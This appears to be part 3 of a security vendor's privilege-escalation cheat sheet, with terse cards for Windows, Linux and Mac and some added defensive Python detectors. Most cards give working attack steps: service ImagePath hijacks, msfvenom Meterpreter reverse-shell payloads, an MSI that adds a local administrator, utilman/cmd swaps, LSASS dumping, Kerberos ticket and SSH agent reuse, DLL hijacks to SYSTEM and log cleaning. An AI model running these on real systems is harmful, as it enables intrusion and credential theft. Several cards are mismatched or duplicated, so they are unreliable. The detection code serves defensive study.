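SERVICE_NAME: unquotedsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
        DISPLAY_NAME       : Unquoted Path Service
        SERVICE_START_NAME : LocalSystem

SERVICE_NAME: goodsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : "C:\Program Files\Good Service\goodsvc.exe" -config "C:\Program Files\Good Service\svc.ini"
        SERVICE_START_NAME : LocalSystem
"""

if __name__ == "__main__":
    for name, cands in audit_services(SAMPLE_SC_QC).items():
        print(name)
        for c in cands:
            print("   would try:", c)
        print("   fix: sc config", name, 'binpath= "' + quoted_binpath(parse_sc_qc(SAMPLE_SC_QC)[name]).replace('"', '\\"') + '"')
```

The candidate list is also the detection surface: a file appearing at `C:\Program Files\Unquoted Path Service\Common.exe` (or any earlier prefix) is the indicator, and a Sysmon file-create rule on those exact paths catches the drop before the service restarts.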



ABUSING SERVICES VIA REGISTRY

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Difficulty:
APT Used:
Detection:

    1. reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
    2. sc start regsvc
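The registry card and the earlier binPath card end in the same place: the service's ImagePath value under HKLM\SYSTEM\CurrentControlSet\Services is rewritten to something the attacker controls. One registry-write rule therefore covers both. The rule below is an added example, not the document's own code; it assumes Sysmon is deployed with RegistryEvent (Event ID 13, value set) enabled for the Services key and that events are available as dicts carrying Sysmon's own field names (Image, TargetObject, Details). The events are constructed.

```python
"""Flag service ImagePath changes that point a service at attacker-controlled code.

Added example for this page; not the document's own code. Assumes Sysmon Event ID
13 coverage of HKLM\System\CurrentControlSet\Services and events exported as dicts
with Sysmon's field names; SAMPLE_EVENTS is constructed.
"""
import re

SERVICES_IMAGEPATH_RE = re.compile(
    r'^HKLM\\System\\CurrentControlSet\\Services\\([^\\]+)\\ImagePath$', re.IGNORECASE)
# A service binary has no business living here.
UNTRUSTED_ROOTS = ("c:\\temp\\", "c:\\tmp\\", "c:\\users\\", "c:\\programdata\\",
                   "%temp%", "%appdata%", "%localappdata%")
# Tokens that mean the "binary" is really a command line.
COMMAND_TOKEN_RE = re.compile(
    r'\b(cmd|powershell|pwsh|net localgroup|rundll32|mshta|wscript|cscript)\b', re.IGNORECASE)
# Legitimate configuration changes go through the service control manager.
EXPECTED_WRITER = "c:\\windows\\system32\\services.exe"


def classify_imagepath_write(event):
    """Reasons an ImagePath write looks suspicious; [] for non-matching or benign events."""
    if event.get("EventID") != 13:
        return []
    if not SERVICES_IMAGEPATH_RE.match(event.get("TargetObject", "")):
        return []
    reasons = []
    value = event.get("Details", "")
    writer = event.get("Image", "")
    if writer.lower() != EXPECTED_WRITER:
        reasons.append(f"ImagePath written directly by {writer} rather than through the "
                       f"service control manager")
    if any(root in value.lower() for root in UNTRUSTED_ROOTS):
        reasons.append("ImagePath points into a user-writable directory")
    if COMMAND_TOKEN_RE.search(value):
        reasons.append("ImagePath is a command line, not a service executable")
    return reasons


def suspicious_imagepath_writes(events):
    """[(service_name, reasons)] for every event that trips at least one rule."""
    hits = []
    for ev in events:
        reasons = classify_imagepath_write(ev)
        if reasons:
            svc = SERVICES_IMAGEPATH_RE.match(ev["TargetObject"]).group(1)
            hits.append((svc, reasons))
    return hits


# Constructed events: a vendor update, the reg add from the card, the sc config
# binpath= from the binPath card, and an unrelated registry write.
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\System32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\VendorSvc\ImagePath",
     "Details": r'"C:\Program Files\Vendor\VendorSvc.exe"'},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\regsvc\ImagePath",
     "Details": r"c:\temp\x.exe"},
    {"EventID": 13, "Image": r"C:\Windows\System32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\daclsvc\ImagePath",
     "Details": "net localgroup administrators user /add"},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\Software\Vendor\Setting", "Details": "DWORD (0x00000001)"},
]

if __name__ == "__main__":
    for svc, reasons in suspicious_imagepath_writes(SAMPLE_EVENTS):
        print(svc, "->", "; ".join(reasons))
```

The preventive control is the service key's DACL and the service's own security descriptor: if non-administrators cannot write the key and do not hold SERVICE_CHANGE_CONFIG on the service, neither card applies and the rule above becomes a pure tamper alarm.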



ABUSING SERVICES VIA EXECUTABLE FILE

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Difficulty:
APT Used:
Detection:

    1. copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"
    2. sc start filepermsvc



ABUSING SERVICES VIA AUTORUN

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Difficulty:
APT Used:
Detection:

    1. In Metasploit (msf > prompt) type: use multi/handler
       In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
       In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
       In Metasploit (msf > prompt) type: run
       Open an additional command prompt and type:
       msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe
    2. Place program.exe in 'C:\Program Files\Autorun Program'.



ABUSING SERVICES VIA ALWAYSINSTALLELEVATED

Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Difficulty:
APT Used:
Detection:

    1. msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f msi-nouac -o setup.msi
    2. msiexec /quiet /qn /i C:\Temp\setup.msi
       Or
       SharpUp.exe AlwaysInstallElevated



ABUSING SERVICES VIA SECREATETOKEN

Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Difficulty:
APT Used:
Detection:

    1. .load C:\dev\PrivEditor\x64\Release\PrivEditor.dll
    2. !rmpriv



ABUSING SERVICES VIA SEDEBUG

Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Difficulty:
APT Used:
Detection:

    1. Conjure-LSASS
       Or
       syscall_enable_priv 20



REMOTE PROCESS VIA SYSCALLS (HELLSGATE|HALOSGATE)

Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Difficulty:
APT Used:
Detection:

    injectEtwBypass pid



ESCALATE WITH DUPLICATETOKENEX

Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Difficulty:
APT Used:
Detection:

    PrimaryTokenTheft.exe pid
    Or
    TokenPlayer.exe --impersonate --pid pid



ABUSING SERVICES VIA SEINCREASEBASEPRIORITY

Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Difficulty:
APT Used:
Detection:

    start /realtime SomeCpuIntensiveApp.exe



ABUSING SERVICES VIA SEMANAGEVOLUME

Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Difficulty:
APT Used:
Detection:

    Compile and run SeManageVolumeAbuse.



ABUSING SERVICES VIA SERELABEL

Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Difficulty:
APT Used:
Detection:

    1. WRITE_OWNER access to a resource, including files and folders.
    2. Run for privilege escalation.



ABUSING SERVICES VIA SERESTORE

Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Difficulty:
APT Used:
Detection:

    1. Launch PowerShell/ISE with the SeRestore privilege present.
    2. Enable the privilege with Enable-SeRestorePrivilege.
    3. Rename utilman.exe to utilman.old.
    4. Rename cmd.exe to utilman.exe.
    5. Lock the console and press Win+U.



ABUSE VIA SEBACKUP

Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Difficulty:
APT Used:
Detection:

    1. In Metasploit (msf > prompt) type: use auxiliary/server/capture/http_basic
       In Metasploit (msf > prompt) type: set uripath x
       In Metasploit (msf > prompt) type: run
    2. In taskmgr, right-click "iexplore.exe" in the "Image Name" column and select
       "Create Dump File" from the popup menu.
    3. strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"
       Copy the Base64-encoded string.
       In a command prompt type: echo -ne [Base64 String] | base64 -d



ABUSING VIA SECREATEPAGEFILE

Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Difficulty:
APT Used:
Detection:

    HIBR2BIN /PLATFORM X64 /MAJOR 6 /MINOR 1 /INPUT hiberfil.sys /OUTPUT uncompressed.bin



ABUSING VIA SESYSTEMENVIRONMENT

Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Difficulty:
APT Used:
Detection:

    1. .load C:\dev\PrivEditor\x64\Release\PrivEditor.dll
    2. TrustExec.exe -m exec -c "whoami /priv" -f



ABUSING VIA SETAKEOWNERSHIP

Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Difficulty:
APT Used:
Detection:

    1. takeown.exe /f "%windir%\system32"
    2. icacls.exe "%windir%\system32" /grant "%username%":F
    3. Rename cmd.exe to utilman.exe.
    4. Lock the console and press Win+U.



ABUSING VIA SETCB

Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Difficulty:
APT Used:
Detection:

    1. PSBits
       Or
       PrivFu
    2. psexec.exe -i -s -d cmd.exe



ABUSING VIA SETRUSTEDCREDMANACCESS

Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Difficulty:
APT Used:
Detection:

    1. .load C:\dev\PrivEditor\x64\Release\PrivEditor.dll
       Or
       CredManBOF
    2. TrustExec.exe -m exec -c "whoami /priv" -f



ABUSING TOKENS VIA SEASSIGNPRIMARYTOKEN

Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Difficulty:
APT Used:
Detection:

    JuicyPotato.exe
    Or
    https://github.com/decoder-it/juicy_2
    https://github.com/antonioCoco/RoguePotato



ABUSING VIA SECREATEPAGEFILE

Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Difficulty:
APT Used:
Detection:

    1. ./WELA.ps1 -LogFile .\Security.evtx -EventIDStatistics
    2. flog -s 10s -n 200
       Or
       invoke-module LogCleaner.ps1


About Hadess

Savior of your Business to combat cyber threats

Hadess performs offensive cybersecurity services through infrastructures and software that include vulnerability analysis, scenario attack planning, and implementation of custom integrated preventive projects. We organized our activities around the prevention of corporate, industrial, and laboratory cyber threats.

Contact Us

To request additional information about Hadess's services, please fill out the form below. A Hadess representative will contact you shortly.

Website: www.hadess.io
Email: [email protected]
Phone No.: +989362181112
Company No.: +982128427515, +982177873383
hadess_security


Hadess Products and Services

SAST | Audit Your Products
Identifying and helping to address hidden weaknesses in your Applications.

RASP | Protect Applications and APIs Anywhere
Identifying and helping to address hidden weaknesses in your organization's security.

PWN Z1 | Audit Your PPP
Identifying and helping to address hidden weaknesses in your organization's security.

Penetration Testing | PROTECTION PRO
Fully assess your organization's threat detection and response capabilities with a simulated cyber-attack.

Red Teaming Operation | PROTECTION PRO
Fully assess your organization's threat detection and response capabilities with a simulated cyber-attack.


HADESS
Secure Agile Development
WWW.HADESS.IO

43 METHODS FOR PRIVILEGE ESCALATION
PART 3


PART 1,2 SUMMARY

No  | Method                                                                   | Domain | APT
----|--------------------------------------------------------------------------|--------|----
1   | Abusing Sudo Binaries                                                    | NO     |
2   | Abusing Scheduled Tasks                                                  | Y/N    |
3   | Golden Ticket With Scheduled Tasks                                       | YES    |
4   | Abusing Interpreter Capabilities                                         | NO     |
5   | Abusing Binary Capabilities                                              | NO     |
6   | Abusing ActiveSessions Capabilities                                      | NO     |
7   | Escalate with TRUSTWORTHY in SQL Server                                  | Y/N    |
8   | Abusing MySQL run as root                                                | Y/N    |
9   | Abusing journalctl                                                       | NO     |
10  | Abusing VDS                                                              | NO     |
11  | Abusing Browser Credentials                                              | NO     |
12  | Abusing LDAP                                                             | YES    |
13  | LLMNR Poisoning                                                          | YES    |
14  | Abusing Certificate Services                                             | YES    |
15  | MySQL UDF Code Injection                                                 | Y/N    |
16  | Impersonation Token with ImpersonateLoggedOnUser                         | YES    |
17  | Impersonation Token with SeImpersonatePrivilege                          | YES    |
18  | Impersonation Token with SeLoadDriverPrivilege                           | YES    |
19  | OpenVPN                                                                  | NO     |
20  | Bash History                                                             | NO     |
21  | Package Capture                                                          | Y/N    |
22  | NFS Root Squashing                                                       | NO     |
23  | Abusing Access Control List                                              | Y/N    |
24  | Escalate With SeBackupPrivilege                                          | YES    |
25  | Escalate With SeImpersonatePrivilege                                     | YES    |
26  | Escalate With SeLoadDriverPrivilege                                      | YES    |
27  | Escalate With ForceChangePassword                                        | YES    |
28  | Escalate With GenericWrite                                               | YES    |
29  | Abusing GPO                                                              | YES    |
30  | Pass-the-Ticket                                                          | YES    |
31  | Golden Ticket                                                            | YES    |
32  | Abusing Splunk Universal Forwarder                                       | NO     |
33  | Abusing Gdbus                                                            | Y/N    |
34  | Abusing Trusted DC                                                       | YES    |
35  | NTLM Relay                                                               | YES    |
36  | Exchange Relay                                                           | YES    |
37  | Dumping with diskshadow                                                  | YES    |
38  | Dumping with vssadmin                                                    | YES    |
39  | Password Spraying                                                        | Y/N    |
40  | AS-REP Roasting                                                          | YES    |
41  | DirtyC0w                                                                 | NO     |
42  | CVE-2016-1531                                                            | NO     |
43  | Polkit                                                                   | NO     |
44  | DirtyPipe                                                                | NO     |
45  | PwnKit                                                                   | NO     |
46  | ms14_058                                                                 | NO     |
47  | Hot Potato                                                               | Y/N    |
48  | Intel SYSRET                                                             | NO     |
49  | PrintNightmare                                                           | YES    |
50  | Follina                                                                  | Y/N    |
51  | ALPC                                                                     | NO     |
52  | RemotePotato0                                                            | YES    |
53  | CVE-2022-26923                                                           | NO     |
54  | MS14-068                                                                 | NO     |
55  | Sudo LD_PRELOAD                                                          | NO     |
56  | Abusing File Permission via SUID Binaries - (.so injection)              | NO     |
57  | DLL Injection                                                            | Y/N    |
58  | Early Bird Injection                                                     | Y/N    |
59  | Process Injection through Memory Section                                 | Y/N    |
60  | Abusing Scheduled Tasks via Cron Path Overwrite                          | Y/N    |
61  | Abusing Scheduled Tasks via Cron Wildcards                               | Y/N    |
62  | Abusing File Permission via SUID Binaries - (Symlink)                    | NO     |
63  | Abusing File Permission via SUID Binaries - (Environment Variables #1)   | NO     |
64  | Abusing File Permission via SUID Binaries - (Environment Variables #2)   | NO     |
65  | DLL Hijacking                                                            | Y/N    |
66  | Abusing Services via binPath                                             | NO     |
67  | Abusing Services via Unquoted Path                                       | NO     |
68  | Abusing Services via Registry                                            | NO     |
69  | Abusing Services via Executable File                                     | NO     |
70  | Abusing Services via Autorun                                             | NO     |
71  | Abusing Services via AlwaysInstallElevated                               | NO     |
72  | Abusing Services via SeCreateToken                                       | NO     |
73  | Abusing Services via SeDebug                                             | NO     |
74  | Remote Process via Syscalls (HellsGate|HalosGate)                        | NO     |
75  | Escalate With DuplicateTokenEx                                           | NO     |
76  | Abusing Services via SeIncreaseBasePriority                              | NO     |
77  | Abusing Services via SeManageVolume                                      | NO     |
78  | Abusing Services via SeRelabel                                           | NO     |
79  | Abusing Services via SeRestore                                           | NO     |
80  | Abuse via SeBackup                                                       | NO     |
81  | Abusing via SeCreatePagefile                                             | NO     |
82  | Abusing via SeSystemEnvironment                                          | NO     |
83  | Abusing via SeTakeOwnership                                              | NO     |
84  | Abusing via SeTcb                                                        | NO     |
85  | Abusing via SeTrustedCredManAccess                                       | NO     |
86  | Abusing tokens via SeAssignPrimaryToken                                  | NO     |
87  | Abusing via SeCreatePagefile                                             | NO     |
88  | Certificate Abuse                                                        | Y/N    |
89  | Password Mining in Memory (#1)                                           | NO     |
90  | Password Mining in Memory (#2)                                           | NO     |
91  | Password Mining in Registry                                              | NO     |
92  | Password Mining in General Events via SeAudit                            | NO     |
93  | Password Mining in Security Events via SeSecurity                        | NO     |
94  | Startup Applications                                                     | NO     |
95  | Password Mining in McAfeeSitelistFiles                                   | NO     |
96  | Password Mining in CachedGPPPasswor                                      | YES    |
97  | Password Mining in DomainGPPPassword                                     | YES    |
98  | Password Mining in KeePass                                               | NO     |
99  | Password Mining in WindowsVault                                          | NO     |
100 | Password Mining in SecPackageCreds                                       | YES    |
101 | Password Mining in PuttyHostKeys                                         | YES    |
102 | Password Mining in RDCManFiles                                           | YES    |
103 | Password Mining in RDPSavedConnections                                   | YES    |
104 | Password Mining in MasterKeys                                            | NO     |
105 | Password Mining in Browsers                                              | Y/N    |
106 | Password Mining in Files                                                 | Y/N    |
107 | Password Mining in LDAP                                                  | Y/N    |
108 | Password Mining in Clipboard                                             | Y/N    |
109 | Password Mining in GMSA Password                                         | Y/N    |
110 | Delegate tokens via RDP                                                  | Y/N    |
111 | Delegate tokens via FTP                                                  | Y/N    |
112 | Fake Logon Screen                                                        | Y/N    |
113 | Abusing WinRM Services                                                   | Y/N    |


PART 3

DUMP LSASS WITH SILENTPROCESSEXIT

Domain: No
Local Admin: Yes
OS: Windows
Type: Enumeration & Hunting
Difficulty:
APT Used:
Detection:

    SilentProcessExit.exe pid


LSASS SHTINKERING

Domain: No
Local Admin: Yes
OS: Windows
Type: Enumeration & Hunting
Difficulty:
APT Used:
Detection:

    HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps -> 2
    LSASS_Shtinkering.exe pid
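The two cards above arrange for Windows itself to write an lsass.exe dump, one through the SilentProcessExit / Image File Execution Options keys and one through Windows Error Reporting's LocalDumps; the tools on the following cards open lsass.exe directly and read its memory. Both leave telemetry: a registry value set under those keys (Sysmon Event ID 13) and a process handle to lsass.exe with PROCESS_VM_READ in GrantedAccess (Sysmon Event ID 10). The scanner below is an added example, not the document's own code. It assumes events are available as dicts carrying Sysmon's field names; the events, the registry values and the known-reader list are constructed and need tuning per environment.

```python
"""Spot LSASS dump preparation and LSASS memory reads in Sysmon-style events.

Added example for this page; not the document's own code. SAMPLE_EVENTS and
KNOWN_READERS are constructed; GrantedAccess bit names follow the Win32
PROCESS_* access rights.
"""
import re

PROCESS_VM_READ = 0x0010
ACCESS_NAMES = {
    0x0001: "TERMINATE", 0x0002: "CREATE_THREAD", 0x0008: "VM_OPERATION", 0x0010: "VM_READ",
    0x0020: "VM_WRITE", 0x0040: "DUP_HANDLE", 0x0080: "CREATE_PROCESS", 0x0200: "SET_INFORMATION",
    0x0400: "QUERY_INFORMATION", 0x0800: "SUSPEND_RESUME", 0x1000: "QUERY_LIMITED_INFORMATION",
}
# Registry locations that make Windows dump lsass.exe on exit or crash.
DUMP_ARMING_KEYS_RE = re.compile(
    r"\\(Image File Execution Options|SilentProcessExit)\\lsass\.exe\\"
    r"|\\Windows Error Reporting\\LocalDumps\\", re.IGNORECASE)
# Processes that legitimately read LSASS memory on this (constructed) baseline.
KNOWN_READERS = {"c:\\windows\\system32\\csrss.exe", "c:\\windows\\system32\\wininit.exe"}


def decode_access(granted):
    """Turn a GrantedAccess value such as '0x1010' into (mask, [right names])."""
    mask = int(granted, 16) if isinstance(granted, str) else int(granted)
    return mask, [name for bit, name in sorted(ACCESS_NAMES.items()) if mask & bit]


def lsass_findings(event):
    eid = event.get("EventID")
    if eid == 13 and DUMP_ARMING_KEYS_RE.search(event.get("TargetObject", "")):
        return [f"{event.get('Image')} set {event.get('TargetObject')} = {event.get('Details')}: "
                f"arms a dump-on-exit/crash path for lsass.exe"]
    if eid == 10 and event.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        mask, names = decode_access(event.get("GrantedAccess", "0x0"))
        source = event.get("SourceImage", "")
        if mask & PROCESS_VM_READ and source.lower() not in KNOWN_READERS:
            return [f"{source} opened lsass.exe with {hex(mask)} ({', '.join(names)})"]
    return []


def scan_lsass_events(events):
    hits = []
    for ev in events:
        hits.extend(lsass_findings(ev))
    return hits


# Constructed events: the two registry preparations, a system process, a dumper, and a
# query-only handle that carries no memory-read right.
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsass.exe\GlobalFlag",
     "Details": "DWORD (0x00000200)"},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\lsass.exe\DumpType",
     "Details": "DWORD (0x00000002)"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Users\user\Desktop\AndrewSpecial.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
]

if __name__ == "__main__":
    for msg in scan_lsass_events(SAMPLE_EVENTS):
        print(msg)
```

Running LSASS as a protected process (RunAsPPL) or with Credential Guard removes the memory-read path for most of the tools on these cards; the registry rule remains useful because the WER/SilentProcessExit approach does not open the process itself.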


ANDREWSPECIAL

Domain: No
Local Admin: Yes
OS: Windows
Type: Enumeration & Hunting
Difficulty:
APT Used:
Detection:

    AndrewSpecial.exe


CCACHE TICKET REUSE FROM /TMP

Domain: Yes
Local Admin: Yes
OS: Linux
Type: Enumeration & Hunting
Difficulty:
APT Used:
Detection:

    ls /tmp/ | grep krb5cc_X
    export KRB5CCNAME=/tmp/krb5cc_X


CCACHE TICKET REUSE FROM KEYRING

Domain: Yes
Local Admin: Yes
OS: Linux
Type: Enumeration & Hunting
Difficulty:
APT Used:
Detection:

    https://github.com/TarlogicSecurity/tickey
    /tmp/tickey -i


CCACHE TICKET REUSE FROM SSSD KCM

Domain: Yes
Local Admin: Yes
OS: Linux
Type: Enumeration & Hunting
Difficulty:
APT Used:
Detection:

    git clone https://github.com/fireeye/SSSDKCMExtractor
    python3 SSSDKCMExtractor.py --database secrets.ldb --key secrets.mkey


CCACHE TICKET REUSE FROM KEYTAB

Domain: Yes
Local Admin: Yes
OS: Linux/Windows/Mac
Type: Enumeration & Hunting
Difficulty:
APT Used:
Detection:

    git clone https://github.com/its-a-feature/KeytabParser
    python KeytabParser.py /etc/krb5.keytab
    klist -k /etc/krb5.keytab
    Or
    klist.exe -t -K -e -k FILE:C:\Users\User\downloads\krb5.keytab
    python3 keytabextract.py krb5.keytab
    ./bifrost -action dump -source keytab -path test
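The four ccache cards above all start from a credential file that another local user can read: a cache left in /tmp, a keytab with loose permissions, or a renamed copy of either. The audit below is an added example, not the document's own code. It recognises files by their krb5 on-disk signatures (0x0504 for a version-4 credential cache, 0x0502 for a keytab) as well as by name, so a renamed cache is still found, and checks mode and ownership. `build_sample_dir()` writes a constructed layout into a temporary directory; for a real check call `audit_kerberos_files("/tmp")` or the directory KRB5CCNAME points at.

```python
"""Audit a directory for Kerberos credential caches and keytabs with weak mode or ownership.

Added example for this page; not the document's own code. The sample directory is
constructed by build_sample_dir(); the signature bytes are the MIT krb5 file format
markers.
"""
import os
import re
import stat
import tempfile

CCACHE_MAGIC = b"\x05\x04"   # MIT krb5 credential cache, file format version 4
KEYTAB_MAGIC = b"\x05\x02"   # krb5 keytab, format version 2
CCACHE_NAME_RE = re.compile(r"^krb5cc_(\d+)")


def classify(name, magic):
    """'ccache', 'keytab' or None, from the file name or the first two bytes."""
    if CCACHE_NAME_RE.match(name) or magic == CCACHE_MAGIC:
        return "ccache"
    if name.endswith(".keytab") or magic == KEYTAB_MAGIC:
        return "keytab"
    return None


def audit_kerberos_files(directory):
    """Return (file_name, finding) pairs for credential files other local users could reuse."""
    findings = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        st = os.lstat(path)
        if not stat.S_ISREG(st.st_mode):
            continue                          # symlinks and directories are not credential files
        with open(path, "rb") as f:
            kind = classify(name, f.read(2))
        if kind is None:
            continue
        if st.st_mode & 0o077:
            findings.append((name, f"{kind} accessible by group/other (mode "
                                   f"{stat.S_IMODE(st.st_mode):04o}); any local user can copy it "
                                   f"and point KRB5CCNAME at the copy"))
        m = CCACHE_NAME_RE.match(name)
        if kind == "ccache" and m and int(m.group(1)) != st.st_uid:
            findings.append((name, f"ccache named for uid {m.group(1)} but owned by uid {st.st_uid}"))
    return findings


def build_sample_dir():
    """Create a constructed sample directory and return its path."""
    d = tempfile.mkdtemp(prefix="krb5audit_")
    uid = os.getuid()
    samples = {
        f"krb5cc_{uid}":     (CCACHE_MAGIC, 0o600),   # healthy cache: owner-only, name matches owner
        f"krb5cc_{uid + 1}": (CCACHE_MAGIC, 0o600),   # cache whose name does not match its owner
        "stale.bin":         (CCACHE_MAGIC, 0o644),   # renamed cache, readable by everyone
        "svc.keytab":        (KEYTAB_MAGIC, 0o644),   # keytab readable by everyone
        "notes.txt":         (b"hi",        0o644),   # unrelated file, must be ignored
    }
    for name, (magic, mode) in samples.items():
        path = os.path.join(d, name)
        with open(path, "wb") as f:
            f.write(magic + b"\x00" * 14)
        os.chmod(path, mode)
    return d


if __name__ == "__main__":
    for name, msg in audit_kerberos_files(build_sample_dir()):
        print(f"{name}: {msg}")
```

Beyond file permissions, the keyring and KCM variants on the cards are addressed by the cache type itself: `default_ccache_name = KEYRING:persistent:%{uid}` in krb5.conf keeps tickets out of the filesystem, and SSSD's KCM store is only readable by root, which is why those cards require local admin.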


SSH FORWARDER

Domain: No
Local Admin: Yes
OS: Linux
Type: Enumeration & Hunting
Difficulty:
APT Used:
Detection:

    ForwardAgent yes
    SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816 ssh bob@boston
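The second line above only works because the first one was set: with `ForwardAgent yes`, root on the intermediate host can pick up the forwarded agent socket and sign with the user's keys. The small parser below is an added example, not the document's own code; it reports every place an OpenSSH client configuration switches agent forwarding on, together with the Host block it applies to, since a `ForwardAgent yes` under `Host *` is the case that matters. The config text is constructed.

```python
"""Find where ForwardAgent is enabled in an OpenSSH client configuration.

Added example for this page; not the document's own code. SAMPLE_CONFIG is
constructed; pass the text of ~/.ssh/config or /etc/ssh/ssh_config instead.
"""
import re

# keyword, then '=' or whitespace, then the value (OpenSSH accepts both separators)
KEYWORD_RE = re.compile(r'^\s*(\w+)\s*[=\s]\s*(.*?)\s*$')


def forward_agent_hosts(text):
    """Return (line_number, host_pattern) pairs where ForwardAgent is yes."""
    hits = []
    scope = "*"              # directives before the first Host/Match block apply everywhere
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0]
        m = KEYWORD_RE.match(line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2)
        if key in ("host", "match"):
            scope = value
        elif key == "forwardagent" and value.strip('"').lower() == "yes":
            hits.append((lineno, scope))
    return hits


# Constructed client configuration.
SAMPLE_CONFIG = """\
# constructed ~/.ssh/config
Host bastion
    HostName bastion.example.net
    ForwardAgent yes

Host build-*
    ForwardAgent no

Host *
    ForwardAgent yes
"""

if __name__ == "__main__":
    for lineno, scope in forward_agent_hosts(SAMPLE_CONFIG):
        print(f"line {lineno}: ForwardAgent yes for Host {scope}")
```

On the server side the equivalent knob is `AllowAgentForwarding no` in sshd_config; where forwarding is genuinely needed, `ssh -J` jump hosts or an agent that asks for confirmation on every signature (`ssh-add -c`) limit what a compromised intermediate host can do with the socket.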


APPLESCRIPT

Domain: No
Local Admin: Yes
OS: Mac
Type: Enumeration & Hunting
Difficulty:
APT Used:
Detection:

    (EmPyre) > listeners
    (EmPyre: listeners) > set Name mylistener
    (EmPyre: listeners) > execute
    (EmPyre: listeners) > usestager applescript mylistener
    (EmPyre: stager/applescript) > execute


DLL SEARCH ORDER HIJACKING

Domain: No
Local Admin: Yes
OS: Windows
Type: Hijack
Difficulty:
APT Used:
Detection:

    https://github.com/slaeryan/AQUARMOURY/tree/master/Brownie
    Brownie


SLUI FILE HANDLER HIJACK LPE

Domain: No
Local Admin: Yes
OS: Windows
Type: Hijack
Difficulty:
APT Used:
Detection:

    https://github.com/bytecode77/slui-file-handler-hijack-privilege-escalation
    Slui.exe


CDPSVC DLL HIJACKING

Domain: No
Local Admin: Yes
OS: Windows
Type: Hijack
Difficulty:
APT Used:
Detection:

    Cdpsgshims.exe


MAGNIFY.EXE DLL SEARCH ORDER HIJACKING

Domain: No
Local Admin: Yes
OS: Windows
Type: Hijack
Difficulty:
APT Used:
Detection:

    Copy the payload DLL as igdgmm64.dll into a writable directory on the SYSTEM %PATH%, such as C:\python27.
    Press WinKey+L.
    Press Enter.
    On the login screen that shows the password box, press WinKey and + (plus key).
    The payload DLL then executes with SYSTEM access.


CDPSVC SERVICE

Domain: No
Local Admin: Yes
OS: Windows
Type: Hijack
Difficulty:
APT Used:
Detection:

    Find a writable directory on the SYSTEM PATH with acltest.ps1 (such as C:\python27):
    C:\CdpSvcLPE> powershell -ep bypass ". .\acltest.ps1"
    Copy cdpsgshims.dll to C:\python27.
    Create C:\temp and copy impersonate.bin into it:
    C:\CdpSvcLPE> mkdir C:\temp
    C:\CdpSvcLPE> copy impersonate.bin C:\temp
    Reboot (or stop/start CDPSvc as an administrator).
    A cmd window will pop up running as nt authority\system.
